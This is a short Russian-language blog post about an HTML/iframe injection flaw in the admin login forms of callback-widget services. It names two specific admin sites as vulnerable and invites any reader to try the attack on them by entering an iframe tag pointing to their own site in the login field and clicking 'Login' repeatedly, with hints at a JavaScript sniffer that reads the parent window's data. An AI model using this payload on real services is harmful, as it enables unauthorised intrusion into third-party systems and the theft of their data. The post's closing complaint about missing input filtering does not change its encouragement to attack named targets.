Взлом сервиса обратного звонка

Взлом сервиса обратного звонка

Это скорее шутка с iframe, чем взлом сервиса обратного звонка. Но в каждой шутке — есть доля правды. Что если заранее подготовить некий сайт со сниффером на JavaScript который выводит переменные из Родительского окна будучи сам там запущенный как Клиент. Значит он «унаследует» все свойства «родителя» (родительского окна, html 5 класс школы), а именно: переменные суперглобального массива, свойства объектов, другие переменные «родителя». Это и предполагает, что такая атака может быть осуществлена некими злоумышленниками. Sniffer выведет вам данные на экране в окне ифрейма, да как угодно. А суть в том, что разработчики сайтов, так по-быстрее хотели получить денег за проект (или работали «из под палки»), что даже не потрудились вписать в поля банальный фильтр strip_tags(); убивающий теги. Хакеры проделывали это уже несколько раз с сайтами http://admin.leadomed.ru/ и http://admin.f1call.com/ Впрочем вы сами можете побаловаться. Любой желающий. В этом нет ничего предсудительного. Достаточно в поле логин ввести <iframe src=http://vk.ru></iframe> где, вместо vk.ru  вписывайте свой сайт. Пароль — любой. Теперь введя свой ифрейм, можно быстро-быстро тыкать на кнопочку «Войти» и будет много «дзынь-дзынь» 🙂 Чаще тыкаешь — больше дзыней дзынькает! В окошечках Админки теперь загружаются Ваши сайты — любые. Весело! Ну а дальше, это уже совсем другая история, которую мы по понятным причинам не будем раскрывать, так нас попросили друзья. А вы говорите хакеры, взломали АТС, или VoIP, пришол нелепый счёт за звонки которых не было… информация для размышления. Господа программисты, ну как же так — отфильтровать вводимые данные в строке забыли, это же работы на две строчки кода… -«Скажите и в магазине также стену можно приоткрыть?» цитата из фильма. Если вы не согласны, это не значит что мы далеки от истины.